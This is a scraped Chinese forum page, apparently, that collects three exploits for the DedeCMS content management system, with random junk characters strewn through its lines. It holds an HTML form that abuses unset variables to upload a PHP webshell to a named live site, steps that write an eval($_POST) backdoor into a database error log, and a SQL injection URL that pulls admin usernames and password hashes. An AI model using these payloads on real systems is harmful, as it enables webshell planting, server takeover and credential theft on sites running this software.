& M( u7 x2 [7 _4 A织梦(Dedecms)select_soft_post.php页面变量未初始漏洞' m: C% i% }" r% j1 o3 d
<html>
- `) ^9 i" I1 A: _: O5 s<head>- n5 }5 p; [& W: b2 `% M
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
( }" g& F6 Q! ?</head>5 Z8 c' k) t7 r- X
<body style="FONT-SIZE: 9pt">2 {( H% o7 w+ u" ?3 b- t
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />* O8 d1 X; ]. N5 F( |
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
9 D# B% u* W" V4 q5 a7 R# n( c<input type='hidden' name='activepath' value='/data/cache/' />' Y3 E9 m8 i2 U
<input type='hidden' name='cfg_basedir' value='../../' />, {" S+ r N5 h# U8 R: p) A
<input type='hidden' name='cfg_imgtype' value='php' />
+ g+ F2 i+ j5 C6 v+ v9 x. a<input type='hidden' name='cfg_not_allowall' value='txt' />
$ k6 s' P9 k% L6 S% _# M" Q9 u- U<input type='hidden' name='cfg_softtype' value='php' />
! L- d# s# ~$ I f n; U ]<input type='hidden' name='cfg_mediatype' value='php' />! K7 M1 h! S) c, Q4 y2 Q
<input type='hidden' name='f' value='form1.enclosure' />& X# F+ @# j; Y/ P7 C5 t
<input type='hidden' name='job' value='upload' />4 S V% ? [; j
<input type='hidden' name='newname' value='fly.php' />. z0 ?( R0 R1 H: K
Select U Shell <input type='file' name='uploadfile' size='25' />
) m% e6 N8 T& G6 X' |: e3 y# b; ]<input type='submit' name='sb1' value='确定' />
; M3 U9 @4 ~- d6 x; e% G</form>
4 n2 L9 S' M( u1 ?<br />It's just a exp for the bug of Dedecms V55...<br />
5 ?9 V* q9 F5 s2 i$ ?5 Y: W9 ~' k& C& aNeed register_globals = on...<br />$ c6 |! [5 J# H. v S. h
Fun the game,get a webshell at /data/cache/fly.php...<br />7 q% E; r8 @- d
</body>
4 s- F) i" d; f" a( ?, m* h, n: K</html>9 O4 i: K& ?9 N8 b2 k5 ?
. z0 r, b- k6 y; l$ x+ @1 w
: }9 `; i5 O9 }! `$ g
3 k$ u6 E1 O& |7 g$ q
% n1 Y2 A, [7 o r- `
: J* {0 c* v/ J2 d: M+ J
8 o( {% i- H3 ?, ~! U
* x4 R0 S$ [% S5 L/ G
4 n8 p) L, Y& W4 \
/ x. E! A; A+ I4 _1 [7 [: M
0 ?4 @2 H) N$ }. Q1 z织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞7 s: q; q- t Z1 @
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。+ g- B/ C) Q5 Y* i) A' x/ q
1. 访问网址:
7 O& ], g" P+ \2 W' b; ghttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
. I# {% S1 n; y2 P可看见错误信息/ g4 I0 P. T r1 ]. h- f
/ x" Q, T% G9 U' ^, J
$ ^6 [$ n# U% b, ^3 e" K9 e2 g1 W
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。# |3 d6 s7 w& u0 a
int(3) Error: Illegal double '1024e1024' value found during parsing
5 ~4 r) K( K$ ]( Y8 \, K6 VError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>6 J+ E- x, k+ N3 K* Q8 Z. n* I
" R& G9 k0 o, P* D* J2 M; M/ {2 f
' v1 s% ~5 {; [: w [3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是, N# P4 ? F" X. q6 F1 N, X( h
1 a' w4 ]& n2 U2 m7 i9 }6 y7 |9 h9 P( I Z* u
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
. {0 \/ R* V d" c4 B) A$ F
- D! G5 s' S) d# q( j
9 {. u& k) C- G% w% G按确定后的看到第2步骤的信息表示文件木马上传成功.
5 D6 c1 L% r3 w" R& F5 x: G) F
" W! G/ |6 B# C' r6 F3 J0 x# w
! n6 ]% r* S7 Y) |* r3 H& A
6 @+ z) m ~* |0 o% x
( m' n& v9 W* J1 E0 }
* \. M) h6 d1 L& b" g; Z, ?
% c$ ^. e p7 p; @
# x* i' e# T- F( m$ l) n% R) f$ N( {5 k3 ~9 w6 O
5 _) h) f w8 {8 q: n" m
+ M/ t2 o9 `$ u5 N0 t" e1 ~% C b4 e5 E( I' d2 b* x
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
- Y/ }/ j& h7 S$ `4 ?http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|